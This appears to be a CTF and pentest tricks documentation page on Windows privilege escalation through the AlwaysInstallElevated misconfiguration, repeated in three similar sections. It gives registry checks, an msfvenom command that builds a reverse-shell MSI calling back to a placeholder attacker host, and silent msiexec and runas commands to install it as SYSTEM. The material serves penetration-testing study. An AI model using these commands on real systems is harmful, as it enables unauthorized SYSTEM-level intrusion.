> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/windows/getsystem/privilege-escalation-windows-misconfiguration.md).

# Misconfiguration

## Exploit AlwaysInstallElevated via MSI Payload

When the `AlwaysInstallElevated` policy is enabled, the Windows Installer service (`msiexec`) performs installations with elevated privileges, specifically as `SYSTEM`. This policy must be enabled in both the `HKEY_LOCAL_MACHINE` and `HKEY_CURRENT_USER` registry hives for the vulnerability to be exploitable by a standard user.

The relevant registry keys are:

* `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer`
* `HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer`

The policy is enabled if the `AlwaysInstallElevated` DWORD value is set to `1` in *both* locations.

You can check this policy setting from the command line using `reg query`:

```bash
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

Alternatively, using PowerShell:

```powershell
Get-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer\ | Select-Object AlwaysInstallElevated
Get-ItemProperty HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer\ | Select-Object AlwaysInstallElevated
```

If both queries return a value of `1`, the policy is enabled and exploitation is possible. You can exploit this by crafting a malicious Microsoft Installer (`.msi`) package and executing it.

Generate an MSI payload using a tool like `msfvenom`. For instance, to create a reverse TCP meterpreter payload:

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<listener_port> -f msi -o payload.msi
```

Other payloads like `windows/shell_reverse_tcp` or `windows/x64/shell_reverse_tcp` can also be used, and output can be redirected using `>` instead of `-o`.

Transfer the generated `payload.msi` file to the target system. On the target, execute the MSI package silently using `msiexec`. The `/qn` switch is used for a completely quiet installation with no user interface.

```powershell
msiexec /qn /i payload.msi
```

The `/i` parameter indicates that an installation should be performed.

Ensure you have a listener set up on your attacker machine (`<attacker_ip>:<listener_port>`) to catch the incoming `SYSTEM` shell. Metasploit's `msfconsole` is commonly used for this purpose.

***

## Identify AlwaysInstallElevated Registry Key

Check the following Windows Registry keys for the value `AlwaysInstallElevated` set to `1`:

* `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer`
* `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`

If *both* keys have `AlwaysInstallElevated` set to `1`, the Windows Installer service will run with SYSTEM privileges when installing MSI packages, regardless of the user's privileges. This allows for privilege escalation by crafting and installing a malicious MSI file.

You can check manually using `reg query`:

```bash
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

Alternatively, you can use PowerShell to check these registry keys:

```powershell
Get-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
Get-ItemProperty HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
```

Many Windows enumeration tools (like WinPEAS) will automatically check for this misconfiguration.

If the misconfiguration is present, a malicious MSI package can be created (for example, using `msfvenom`) and executed by a low-privileged user. The Windows Installer service will execute the package with elevated privileges (SYSTEM), allowing the attacker to perform actions requiring higher privileges, such as adding a user to the Administrators group or executing arbitrary code as SYSTEM.

The malicious MSI can typically be executed using the `msiexec` command-line utility:

```bash
msiexec /quiet /qn /i C:\path\to\your\malicious.msi
```

The `/quiet` and `/qn` switches ensure the installation runs silently without a user interface. The `/i` switch indicates a regular installation. By installing a crafted MSI in this manner, the code within the package will run with SYSTEM privileges inherited from the Windows Installer service due to the `AlwaysInstallElevated` setting.

***

## Windows PE via AlwaysInstallElevated & Runas

When the `AlwaysInstallElevated` policy is enabled (registry keys set to 1 in both HKLM and HKCU), users can install MSI packages with `System` privileges, regardless of their actual user rights. This policy allows any user to run Windows Installer packages with elevated privileges. If you have credentials for a lower-privileged user who can execute commands, you can use `runas` to execute a malicious MSI installer as that user, which will then run with `System` privileges due to the policy.

To check if the `AlwaysInstallElevated` policy is enabled, you can query the relevant registry keys. The policy is enabled if the `AlwaysInstallElevated` DWORD value is set to `1` in both the `HKEY_LOCAL_MACHINE` and `HKEY_CURRENT_USER` hives under the `SOFTWARE\Policies\Microsoft\Windows\Installer` subkey.

You can check this using the `reg` command:

Check HKEY\_LOCAL\_MACHINE:

```bash
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

Check HKEY\_CURRENT\_USER:

```bash
reg query HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

Alternatively, you can use PowerShell to check these registry values:

Check HKEY\_LOCAL\_MACHINE with PowerShell:

```powershell
(Get-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer).AlwaysInstallElevated
```

Check HKEY\_CURRENT\_USER with PowerShell:

```powershell
(Get-ItemProperty HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer).AlwaysInstallElevated
```

If both commands return a value of `0x1` (decimal 1), the policy is enabled, and MSI packages will install with elevated privileges regardless of the user's actual permissions. A value of `0x0` or the absence of the key indicates the policy is not enabled.

Once confirmed, you can execute a malicious MSI package (e.g., containing a reverse shell payload) using `runas` specifying the lower-privileged user's credentials:

```bash
runas /user:LOW_PRIV_USER "msiexec /quiet /qn /i MALICIOUS_MSI_PATH"
```

Replace `LOW_PRIV_USER` with the target user's username and `MALICIOUS_MSI_PATH` with the path to your malicious MSI file. The `msiexec /quiet /qn /i` command installs the MSI package silently (`/quiet`) with no user interface (`/qn`). This requires the malicious MSI to be accessible to the target machine and the lower-privileged user's password will be prompted or potentially supplied via automation if available. Tools and frameworks exist that automate this process, leveraging the `msiexec /i` command to deploy a payload via an MSI package when the policy is active.
